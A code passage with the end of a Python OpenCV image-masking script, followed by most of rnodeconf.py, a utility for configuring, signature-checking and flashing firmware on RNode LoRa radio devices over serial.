newSlice[j][i] = ogSlice[j][i] ogSlice = newSlice # cv2.imshow("OG Slice ", ogSlice) cpSlice = maskSlice.copy()# workerRange = int(max(len(ogSlice)/10,len(ogSlice[0])/10)) for i in range(len(ogSlice)): for j in range(len(ogSlice[0])): if maskSlice[i][j] != 255: workVal = smoothing(maskSlice,ogSlice,workerRange,i,j) if (workVal[0] >= 2 and workVal[1] >= 2) or (workVal[0] > 3): cpSlice[i][j] = 255 # elif workVal[0] > 3: # cpSlice[i][j] = 255 # ogSlice = cpSlice.copy() cpSlice2 = cpSlice.copy() cpSlice = cv2.bitwise_or(maskSlice,ogSlice)#combining the images cpSlice = cv2.bitwise_or(cpSlice2,cpSlice)#combining all the images # cpSlice = cpSlice2 for i in range(len(cpSlice)): for j in range(len(cpSlice[0])): if maskSlice[i][j] != 255: workVal = fillSmallSpace(ogSlice,2,i,j) if workVal == 2: cpSlice[i][j] = 255 nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(cpSlice) sizes = stats[1:, -1] nb_components = nb_components - 1 biggestObject = max(sizes)/2 img2 = output.copy() img2.fill(0) for i in range(0, nb_components):#removal of objects that are smaller than half the size of the biggest detected object if sizes[i] >= biggestObject: img2[output == i + 1] = 255 for i in range(len(ogSlice)): for j in range(len(ogSlice[0])): cpSlice[i][j] = img2[i][j] maskSlice = cpSlice.copy() # imshow("Cp Slice",maskSlice) for i in range(len(ogSlice)): for j in range(len(ogSlice[0])): if maskSlice[i][j] != 255: workVal = smoothing(maskSlice,cpSlice,workerRange,i,j) if workVal[0] > 3 or workVal[1] > 3 : maskSlice[i][j] = 255 cpSlice = maskSlice.copy() rmSlice = cpSlice.copy() drcontours = rmSlice.copy() drcontours = cv2.cvtColor(drcontours, cv2.COLOR_GRAY2RGB) removeIslands = cv2.pyrDown(rmSlice) _, threshed = cv2.threshold(rmSlice, 0, 255, cv2.THRESH_BINARY) contours,_ = cv2.findContours(threshed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) #find maximum contour and draw cmax = max(contours, key = cv2.contourArea) epsilon = 0.002 * cv2.arcLength(cmax, True) approx = cv2.approxPolyDP(cmax, epsilon, True) cv2.drawContours(drcontours, [approx], -1, (0, 255, 0), 2) width, height = rmSlice.shape # imshow("Contour", drcontours) # waitKey(0) #fill maximum contour and draw removeIslands = np.zeros( [width, height, 3],dtype=np.uint8 ) cv2.fillPoly(removeIslands, pts =[cmax], color=(255,255,255))#removes small islands cpSlice = cv2.cvtColor(removeIslands, cv2.COLOR_BGR2GRAY) # waitKey(0) black_image_lines = black_image.copy() # black_image_lines.fill(0) for i in range(len(cpSlice)): for j in range(len(cpSlice[0])): if cpSlice[i][j] != 0: black_image_lines[i+minY][j+minX] = cpSlice[i][j] black_image = black_image_lines # for i in range(len(ogSlice)): # for j in range(len(ogSlice[0])): # if ogSlice[i][j] != 0: # black_image_lines[i+minY][j+minX] = ogSlice[i][j] grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) for i in range(len(img)): for j in range(len(img[0])): if black_image[i][j] != 255: img[i][j] = grey[i][j]#uses the binary mask as a guide to colour the spot colour region print("Done with Image: ",numb) cv2.imshow("Image", img) cv2.imshow("Black image", black_image) # cv2.imshow("Black image lines", black_image_lines) # cv2.imwrite(data_path+"test_output\\v5\\"+str(numb)+"_thr.jpg",black_image) # cv2.imwrite(data_path+"test_output\\v5\\"+str(numb)+"_p.jpg",img) # cv2.imwrite(data_path+"train_output\\v5\\"+str(numb)+"_thr.jpg",black_image) # cv2.imwrite(data_path+"train_output\\v5\\"+str(numb)+"_p.jpg",img) # cv2.imwrite(data_path+"hypothesis\\v5\\"+str(numb)+"_thr.jpg",black_image) # cv2.imwrite(data_path+"hypothesis\\v5\\"+str(numb)+"_p.jpg",img) cv2.waitKey(0) data_path = os.getcwd()+"\\" # for i in range(1,11): # # if i == 3: # # continue # mask = cv2.imread("test_data\\"+str(i)+".jpg") # if __name__ == "__main__": # p1 = Process(target=run_algorithm,args=[mask,i]) # p1.start() # for i in range(1,11): # # if i == 3: # # continue # mask = cv2.imread("train_data\\"+str(i)+".jpg") # if __name__ == "__main__": # p1 = Process(target=run_algorithm,args=[mask,i]) # p1.start() for i in range(1,8): mask = cv2.imread("hypothesis\\"+str(i)+".png") if __name__ == "__main__": p1 = Process(target=run_algorithm,args=[mask,i]) p1.start()
rnodeconf.py
#!python3 # MIT License # # Copyright (c) 2018 Mark Qvist - unsigned.io/rnode # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from time import sleep import argparse import threading import os import os.path import struct import datetime import time import math from urllib.request import urlretrieve from importlib import util program_version = "1.1.9" eth_addr = "0x81F7B979fEa6134bA9FD5c701b3501A2e61E897a" btc_addr = "3CPmacGm34qYvR6XWLVEJmi2aNe3PZqUuq" xmr_addr = "87HcDx6jRSkMQ9nPRd5K9hGGpZLn2s7vWETjMaVM5KfV4TD36NcYa8J8WSxhTSvBzzFpqDwp2fg5GX2moZ7VAP9QMZCZGET" rnode = None rnode_serial = None rnode_port = None rnode_baudrate = 115200 known_keys = [["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100bf831ebd99f43b477caf1a094bec829389da40653e8f1f83fc14bf1b98a3e1cc70e759c213a43f71e5a47eb56a9ca487f241335b3e6ff7cdde0ee0a1c75c698574aeba0485726b6a9dfc046b4188e3520271ee8555a8f405cf21f81f2575771d0b0887adea5dd53c1f594f72c66b5f14904ffc2e72206a6698a490d51ba1105b0203010001"], ["unsigned.io", "30819f300d06092a864886f70d010101050003818d0030818902818100e5d46084e445595376bf7efd9c6ccf19d39abbc59afdb763207e4ff68b8d00ebffb63847aa2fe6dd10783d3ea63b55ac66f71ad885c20e223709f0d51ed5c6c0d0b093be9e1d165bb8a483a548b67a3f7a1e4580f50e75b306593fa6067ae259d3e297717bd7ff8c8f5b07f2bed89929a9a0321026cf3699524db98e2d18fb2d020300ff39"]] firmware_update_url = "https://github.com/markqvist/RNode_Firmware/raw/master/Release/" fw_filename = None mapped_model = None class RNS(): @staticmethod def log(msg): logtimefmt = "%Y-%m-%d %H:%M:%S" timestamp = time.time() logstring = "["+time.strftime(logtimefmt)+"] "+msg print(logstring) @staticmethod def hexrep(data, delimit=True): try: iter(data) except TypeError: data = [data] delimiter = ":" if not delimit: delimiter = "" hexrep = delimiter.join("{:02x}".format(c) for c in data) return hexrep @staticmethod def prettyhexrep(data): delimiter = "" hexrep = "<"+delimiter.join("{:02x}".format(c) for c in data)+">" return hexrep class KISS(): FEND = 0xC0 FESC = 0xDB TFEND = 0xDC TFESC = 0xDD CMD_UNKNOWN = 0xFE CMD_DATA = 0x00 CMD_FREQUENCY = 0x01 CMD_BANDWIDTH = 0x02 CMD_TXPOWER = 0x03 CMD_SF = 0x04 CMD_CR = 0x05 CMD_RADIO_STATE = 0x06 CMD_RADIO_LOCK = 0x07 CMD_DETECT = 0x08 CMD_READY = 0x0F CMD_STAT_RX = 0x21 CMD_STAT_TX = 0x22 CMD_STAT_RSSI = 0x23 CMD_STAT_SNR = 0x24 CMD_BLINK = 0x30 CMD_RANDOM = 0x40 CMD_BOARD = 0x47 CMD_PLATFORM = 0x48 CMD_MCU = 0x49 CMD_FW_VERSION = 0x50 CMD_ROM_READ = 0x51 CMD_ROM_WRITE = 0x52 CMD_ROM_WIPE = 0x59 CMD_CONF_SAVE = 0x53 CMD_CONF_DELETE = 0x54 CMD_RESET = 0x55 DETECT_REQ = 0x73 DETECT_RESP = 0x46 RADIO_STATE_OFF = 0x00 RADIO_STATE_ON = 0x01 RADIO_STATE_ASK = 0xFF CMD_ERROR = 0x90 ERROR_INITRADIO = 0x01 ERROR_TXFAILED = 0x02 ERROR_EEPROM_LOCKED = 0x03 @staticmethod def escape(data): data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd])) data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc])) return data class ROM(): PLATFORM_AVR = 0x90 PLATFORM_ESP32 = 0x80 MCU_1284P = 0x91 MCU_2560 = 0x92 MCU_ESP32 = 0x81 PRODUCT_RNODE = 0x03 MODEL_A4 = 0xA4 MODEL_A9 = 0xA9 PRODUCT_T32_20 = 0xB0 MODEL_B3 = 0xB3 MODEL_B8 = 0xB8 PRODUCT_T32_21 = 0xB1 MODEL_B4 = 0xB4 MODEL_B9 = 0xB9 PRODUCT_TBEAM = 0xE0 MODEL_E4 = 0xE4 MODEL_E9 = 0xE9 PRODUCT_HMBRW = 0xF0 MODEL_FF = 0xFF ADDR_PRODUCT = 0x00 ADDR_MODEL = 0x01 ADDR_HW_REV = 0x02 ADDR_SERIAL = 0x03 ADDR_MADE = 0x07 ADDR_CHKSUM = 0x0B ADDR_SIGNATURE = 0x1B ADDR_INFO_LOCK = 0x9B ADDR_CONF_SF = 0x9C ADDR_CONF_CR = 0x9D ADDR_CONF_TXP = 0x9E ADDR_CONF_BW = 0x9F ADDR_CONF_FREQ = 0xA3 ADDR_CONF_OK = 0xA7 INFO_LOCK_BYTE = 0x73 CONF_OK_BYTE = 0x73 BOARD_RNODE = 0x31 BOARD_HMBRW = 0x32 BOARD_TBEAM = 0x33 BOARD_HUZZAH32 = 0x34 BOARD_GENERIC_ESP32 = 0x35 BOARD_LORA32_V2_0 = 0x36 BOARD_LORA32_V2_1 = 0x37 mapped_product = ROM.PRODUCT_RNODE products = { ROM.PRODUCT_RNODE: "RNode", ROM.PRODUCT_HMBRW: "Hombrew RNode", ROM.PRODUCT_TBEAM: "LilyGO T-Beam", ROM.PRODUCT_T32_20: "LilyGO LoRa32 v2.0", ROM.PRODUCT_T32_21: "LilyGO LoRa32 v2.1", } platforms = { ROM.PLATFORM_AVR: "AVR", ROM.PLATFORM_ESP32:"ESP32", } mcus = { ROM.MCU_1284P: "ATmega1284P", ROM.MCU_2560:"ATmega2560", ROM.MCU_ESP32:"Espressif Systems ESP32", } models = { 0xA4: [410000000, 525000000, 14, "410 - 525 MHz", "rnode_firmware_latest.hex"], 0xA9: [820000000, 1020000000, 17, "820 - 1020 MHz", "rnode_firmware_latest.hex"], 0xB3: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_lora32v20.zip"], 0xB8: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_lora32v20.zip"], 0xB4: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_lora32v21.zip"], 0xB9: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_lora32v21.zip"], 0xE4: [420000000, 520000000, 14, "420 - 520 MHz", "rnode_firmware_latest_tbeam.zip"], 0xE9: [850000000, 950000000, 17, "850 - 950 MHz", "rnode_firmware_latest_tbeam.zip"], 0xFF: [100000000, 1100000000, 14, "(Band capabilities unknown)", None], } squashvw = False class RNode(): def __init__(self, serial_instance): self.serial = serial_instance self.timeout = 100 self.r_frequency = None self.r_bandwidth = None self.r_txpower = None self.r_sf = None self.r_state = None self.r_lock = None self.sf = None self.cr = None self.txpower = None self.frequency = None self.bandwidth = None self.detected = None self.platform = None self.mcu = None self.eeprom = None self.major_version = None self.minor_version = None self.version = None self.provisioned = None self.product = None self.board = None self.model = None self.hw_rev = None self.made = None self.serialno = None self.checksum = None self.signature = None self.signature_valid = False self.locally_signed = False self.vendor = None self.min_freq = None self.max_freq = None self.max_output = None self.configured = None self.conf_sf = None self.conf_cr = None self.conf_txpower = None self.conf_frequency = None self.conf_bandwidth = None def disconnect(self): self.serial.close() def readLoop(self): try: in_frame = False escape = False command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" last_read_ms = int(time.time()*1000) while self.serial.is_open: try: data_waiting = self.serial.in_waiting except Exception as e: data_waiting = False if data_waiting: byte = ord(self.serial.read(1)) last_read_ms = int(time.time()*1000) if (in_frame and byte == KISS.FEND and command == KISS.CMD_ROM_READ): self.eeprom = data_buffer in_frame = False data_buffer = b"" command_buffer = b"" elif (byte == KISS.FEND): in_frame = True command = KISS.CMD_UNKNOWN data_buffer = b"" command_buffer = b"" elif (in_frame and len(data_buffer) < 512): if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN): command = byte elif (command == KISS.CMD_ROM_READ): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_DATA): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False data_buffer = data_buffer+bytes([byte]) elif (command == KISS.CMD_FREQUENCY): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz") self.updateBitrate() elif (command == KISS.CMD_BANDWIDTH): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3] RNS.log("Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz") self.updateBitrate() elif (command == KISS.CMD_FW_VERSION): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 2): self.major_version = command_buffer[0] self.minor_version = command_buffer[1] self.updateVersion() elif (command == KISS.CMD_BOARD): self.board = byte elif (command == KISS.CMD_PLATFORM): self.platform = byte elif (command == KISS.CMD_MCU): self.mcu = byte elif (command == KISS.CMD_TXPOWER): self.r_txpower = byte RNS.log("Radio reporting TX power is "+str(self.r_txpower)+" dBm") elif (command == KISS.CMD_SF): self.r_sf = byte RNS.log("Radio reporting spreading factor is "+str(self.r_sf)) self.updateBitrate() elif (command == KISS.CMD_CR): self.r_cr = byte RNS.log("Radio reporting coding rate is "+str(self.r_cr)) self.updateBitrate() elif (command == KISS.CMD_RADIO_STATE): self.r_state = byte elif (command == KISS.CMD_RADIO_LOCK): self.r_lock = byte elif (command == KISS.CMD_STAT_RX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_rx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_TX): if (byte == KISS.FESC): escape = True else: if (escape): if (byte == KISS.TFEND): byte = KISS.FEND if (byte == KISS.TFESC): byte = KISS.FESC escape = False command_buffer = command_buffer+bytes([byte]) if (len(command_buffer) == 4): self.r_stat_tx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3]) elif (command == KISS.CMD_STAT_RSSI): self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET elif (command == KISS.CMD_STAT_SNR): self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25 elif (command == KISS.CMD_RANDOM): self.r_random = byte elif (command == KISS.CMD_ERROR): if (byte == KISS.ERROR_INITRADIO): RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")") elif (byte == KISS.ERROR_TXFAILED): RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")") else: RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")") elif (command == KISS.CMD_DETECT): if byte == KISS.DETECT_RESP: self.detected = True else: self.detected = False else: time_since_last = int(time.time()*1000) - last_read_ms if len(data_buffer) > 0 and time_since_last > self.timeout: RNS.log(str(self)+" serial read timeout") data_buffer = b"" in_frame = False command = KISS.CMD_UNKNOWN escape = False sleep(0.08) except Exception as e: raise e exit() def updateBitrate(self): try: self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2,self.r_sf)/(self.r_bandwidth/1000)) ) * 1000 self.bitrate_kbps = round(self.bitrate/1000.0, 2) except Exception as e: self.bitrate = 0 def updateVersion(self): minstr = str(self.minor_version) if len(minstr) == 1: minstr = "0"+minstr self.version = str(self.major_version)+"."+minstr def detect(self): kiss_command = bytes([KISS.FEND, KISS.CMD_DETECT, KISS.DETECT_REQ, KISS.FEND, KISS.CMD_FW_VERSION, 0x00, KISS.FEND, KISS.CMD_PLATFORM, 0x00, KISS.FEND, KISS.CMD_MCU, 0x00, KISS.FEND, KISS.CMD_BOARD, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while detecting hardware for "+self(str)) def initRadio(self): self.setFrequency() self.setBandwidth() self.setTXPower() self.setSpreadingFactor() self.setCodingRate() self.setRadioState(KISS.RADIO_STATE_ON) def setFrequency(self): c1 = self.frequency >> 24 c2 = self.frequency >> 16 & 0xFF c3 = self.frequency >> 8 & 0xFF c4 = self.frequency & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring frequency for "+self(str)) def setBandwidth(self): c1 = self.bandwidth >> 24 c2 = self.bandwidth >> 16 & 0xFF c3 = self.bandwidth >> 8 & 0xFF c4 = self.bandwidth & 0xFF data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4])) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring bandwidth for "+self(str)) def setTXPower(self): txp = bytes([self.txpower]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring TX power for "+self(str)) def setSpreadingFactor(self): sf = bytes([self.sf]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring spreading factor for "+self(str)) def setCodingRate(self): cr = bytes([self.cr]) kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring coding rate for "+self(str)) def setRadioState(self, state): kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state for "+self(str)) def setNormalMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_DELETE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def setTNCMode(self): kiss_command = bytes([KISS.FEND, KISS.CMD_CONF_SAVE, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring device mode") def wipe_eeprom(self): kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WIPE, 0xf8, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while wiping EEPROM") sleep(13); def hard_reset(self): kiss_command = bytes([KISS.FEND, KISS.CMD_RESET, 0xf8, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while restarting device") sleep(2); def write_eeprom(self, addr, byte): write_payload = b"" + bytes([addr, byte]) write_payload = KISS.escape(write_payload) kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_WRITE]) + write_payload + bytes([KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while writing EEPROM") def download_eeprom(self): self.eeprom = None kiss_command = bytes([KISS.FEND, KISS.CMD_ROM_READ, 0x00, KISS.FEND]) written = self.serial.write(kiss_command) if written != len(kiss_command): raise IOError("An IO error occurred while configuring radio state") sleep(0.2) if self.eeprom == None: RNS.log("Could not download EEPROM from device. Is a valid firmware installed?") exit() else: self.parse_eeprom() def parse_eeprom(self): global squashvw; try: if self.eeprom[ROM.ADDR_INFO_LOCK] == ROM.INFO_LOCK_BYTE: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend self.provisioned = True self.product = self.eeprom[ROM.ADDR_PRODUCT] self.model = self.eeprom[ROM.ADDR_MODEL] self.hw_rev = self.eeprom[ROM.ADDR_HW_REV] self.serialno = bytes([self.eeprom[ROM.ADDR_SERIAL], self.eeprom[ROM.ADDR_SERIAL+1], self.eeprom[ROM.ADDR_SERIAL+2], self.eeprom[ROM.ADDR_SERIAL+3]]) self.made = bytes([self.eeprom[ROM.ADDR_MADE], self.eeprom[ROM.ADDR_MADE+1], self.eeprom[ROM.ADDR_MADE+2], self.eeprom[ROM.ADDR_MADE+3]]) self.checksum = b"" self.min_freq = models[self.model][0] self.max_freq = models[self.model][1] self.max_output = models[self.model][2] try: self.min_freq = models[self.model][0] self.max_freq = models[self.model][1] self.max_output = models[self.model][2] except Exception as e: RNS.log("Exception") RNS.log(str(e)) self.min_freq = 0 self.max_freq = 0 self.max_output = 0 for i in range(0,16): self.checksum = self.checksum+bytes([self.eeprom[ROM.ADDR_CHKSUM+i]]) self.signature = b"" for i in range(0,128): self.signature = self.signature+bytes([self.eeprom[ROM.ADDR_SIGNATURE+i]]) checksummed_info = b"" + bytes([self.product]) + bytes([self.model]) + bytes([self.hw_rev]) + self.serialno + self.made digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(checksummed_info) checksum = digest.finalize() if self.checksum != checksum: self.provisioned = False RNS.log("EEPROM checksum mismatch") exit() else: RNS.log("EEPROM checksum correct") from cryptography.hazmat.primitives import serialization from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key from cryptography.hazmat.primitives.asymmetric import padding # Try loading local signing key for # validation of self-signed devices if os.path.isdir("./firmware") and os.path.isfile("./firmware/signing.key"): private_bytes = None try: file = open("./firmware/signing.key", "rb") private_bytes = file.read() file.close() except Exception as e: RNS.log("Could not load local signing key") try: private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) public_bytes_hex = RNS.hexrep(public_bytes, delimit=False) vendor_keys = [] for known in known_keys: vendor_keys.append(known[1]) if not public_bytes_hex in vendor_keys: local_key_entry = ["LOCAL", public_bytes_hex] known_keys.append(local_key_entry) except Exception as e: RNS.log("Could not deserialize local signing key") RNS.log(str(e)) for known in known_keys: vendor = known[0] public_hexrep = known[1] public_bytes = bytes.fromhex(public_hexrep) public_key = load_der_public_key(public_bytes, backend=default_backend()) try: public_key.verify( self.signature, self.checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256()) if vendor == "LOCAL": self.locally_signed = True self.signature_valid = True self.vendor = vendor except Exception as e: pass if self.signature_valid: RNS.log("Device signature validated") else: RNS.log("Device signature validation failed") if not squashvw: print(" ") print(" WARNING! This device is NOT verifiable and should NOT be trusted.") print(" Someone could have added privacy-breaking or malicious code to it.") print(" ") print(" Proceed at your own risk and responsibility! If you created this") print(" device yourself, please read the documentation on how to sign your") print(" device to avoid this warning.") print(" ") print(" Always use a firmware downloaded as binaries or compiled from source") print(" from one of the following locations:") print(" ") print(" https://unsigned.io/rnode") print(" https://github.com/markqvist/rnode_firmware") print(" ") print(" You can reflash and bootstrap this device to a verifiable state") print(" by using this utility. It is recommended to do so NOW!") print(" ") print(" To initialise this device to a verifiable state, please run:") print(" ") print(" rnodeconf "+str(self.serial.name)+" --autoinstall") print("") if self.eeprom[ROM.ADDR_CONF_OK] == ROM.CONF_OK_BYTE: self.configured = True self.conf_sf = self.eeprom[ROM.ADDR_CONF_SF] self.conf_cr = self.eeprom[ROM.ADDR_CONF_CR] self.conf_txpower = self.eeprom[ROM.ADDR_CONF_TXP] self.conf_frequency = self.eeprom[ROM.ADDR_CONF_FREQ] << 24 | self.eeprom[ROM.ADDR_CONF_FREQ+1] << 16 | self.eeprom[ROM.ADDR_CONF_FREQ+2] << 8 | self.eeprom[ROM.ADDR_CONF_FREQ+3] self.conf_bandwidth = self.eeprom[ROM.ADDR_CONF_BW] << 24 | self.eeprom[ROM.ADDR_CONF_BW+1] << 16 | self.eeprom[ROM.ADDR_CONF_BW+2] << 8 | self.eeprom[ROM.ADDR_CONF_BW+3] else: self.configured = False else: self.provisioned = False except Exception as e: self.provisioned = False RNS.log("Invalid EEPROM data, could not parse device EEPROM.") def device_probe(self): sleep(2.5) self.detect() sleep(0.1) if self.detected == True: RNS.log("Device connected") RNS.log("Current firmware version: "+self.version) return True else: raise IOError("Got invalid response while detecting device") firmware_version_url = "https://unsigned.io/firmware/latest/?variant=" def download_firmware(fw_filename): try: urlretrieve(firmware_update_url+fw_filename, "update/"+fw_filename) try: urlretrieve(firmware_version_url+fw_filename, "update/"+fw_filename+".version") except Exception as e: pass except Exception as e: RNS.log("Could not download required firmware file. The contained exception was:") RNS.log(str(e)) exit() def rnode_open_serial(port): import serial return serial.Serial( port = port, baudrate = rnode_baudrate, bytesize = 8, parity = serial.PARITY_NONE, stopbits = 1, xonxoff = False, rtscts = False, timeout = 0, inter_byte_timeout = None, write_timeout = None, dsrdtr = False ) def main(): global mapped_product, mapped_model, fw_filename try: if not util.find_spec("serial"): raise ImportError("Serial module could not be found") except ImportError: print("") print("RNode Config Utility needs pyserial to work.") print("You can install it with: pip3 install pyserial") print("") exit() try: if not util.find_spec("cryptography"): raise ImportError("Cryptography module could not be found") except ImportError: print("") print("RNode Config Utility needs the cryptography module to work.") print("You can install it with: pip3 install cryptography") print("") exit() import serial from serial.tools import list_ports try: parser = argparse.ArgumentParser(description="RNode Configuration and firmware utility. This program allows you to change various settings and startup modes of RNode. It can also install, flash and update the firmware on supported devices.") parser.add_argument("-i", "--info", action="store_true", help="Show device info") parser.add_argument("-a", "--autoinstall", action="store_true", help="Automatic installation on various supported devices") parser.add_argument("-u", "--update", action="store_true", help="Update firmware to the latest version") parser.add_argument("--nocheck", action="store_true", help="Don't check for firmware updates online, use existing local files if possible") parser.add_argument("-N", "--normal", action="store_true", help="Switch device to normal mode") parser.add_argument("-T", "--tnc", action="store_true", help="Switch device to TNC mode") parser.add_argument("--freq", action="store", metavar="Hz", type=int, default=None, help="Frequency in Hz for TNC mode") parser.add_argument("--bw", action="store", metavar="Hz", type=int, default=None, help="Bandwidth in Hz for TNC mode") parser.add_argument("--txp", action="store", metavar="dBm", type=int, default=None, help="TX power in dBm for TNC mode") parser.add_argument("--sf", action="store", metavar="factor", type=int, default=None, help="Spreading factor for TNC mode (7 - 12)") parser.add_argument("--cr", action="store", metavar="rate", type=int, default=None, help="Coding rate for TNC mode (5 - 8)") parser.add_argument("-b", "--backup", action="store_true", help="Backup EEPROM to file") parser.add_argument("-d", "--dump", action="store_true", help="Dump EEPROM to console") parser.add_argument("--eepromwipe", action="store_true", help="Unlock and wipe EEPROM") parser.add_argument("--version", action="store_true", help="Print program version and exit") parser.add_argument("-f", "--flash", action="store_true", help=argparse.SUPPRESS) # Flash firmware and bootstrap EEPROM parser.add_argument("-r", "--rom", action="store_true", help=argparse.SUPPRESS) # Bootstrap EEPROM without flashing firmware parser.add_argument("-k", "--key", action="store_true", help=argparse.SUPPRESS) # Generate a new signing key and exit parser.add_argument("-p", "--public", action="store_true", help=argparse.SUPPRESS) # Display public part of signing key parser.add_argument("--platform", action="store", metavar="platform", type=str, default=None, help=argparse.SUPPRESS) # Platform specification for device bootstrap parser.add_argument("--product", action="store", metavar="product", type=str, default=None, help=argparse.SUPPRESS) # Product specification for device bootstrap parser.add_argument("--model", action="store", metavar="model", type=str, default=None, help=argparse.SUPPRESS) # Model code for device bootstrap parser.add_argument("--hwrev", action="store", metavar="revision", type=int, default=None, help=argparse.SUPPRESS) # Hardware revision for device bootstrap parser.add_argument("port", nargs="?", default=None, help="serial port where RNode is attached", type=str) args = parser.parse_args() def print_donation_block(): print(" 